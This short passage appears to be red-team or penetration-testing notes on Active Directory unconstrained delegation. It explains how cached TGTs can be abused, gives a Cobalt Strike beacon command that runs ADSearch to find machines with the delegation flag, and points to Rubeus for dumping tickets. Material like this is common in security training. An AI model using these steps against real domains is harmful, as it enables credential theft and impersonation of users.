A service or machine account with unconstrained delegation can authenticate into all other services on behalf of a client, even those that the service does not need to access. This is implemented by caching the client’s TGT so that it could later be used to authenticate against other domain services.

Danger!

Unconstrained delegation is not recommended: use constrained delegation whenever possible. Once an account permitted for unconstrained delegation is compromised, TGTs that were cached for unconstrained delegation could be dumped and used to impersonate the associated principals.

Exploit

To find machine accounts permitted for unconstrained delegation using ADSearch (userAccountControl stores many flags related to the user; the 1.2.840... string is a OID for bitwise matching; 524288 = 2^19 is a mask for unconstrained delegation):

NOTE

Domain controller machine accounts may always perform unconstrained delegation.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

To attack, simply use Rubeus to triage and dump any cached TGT.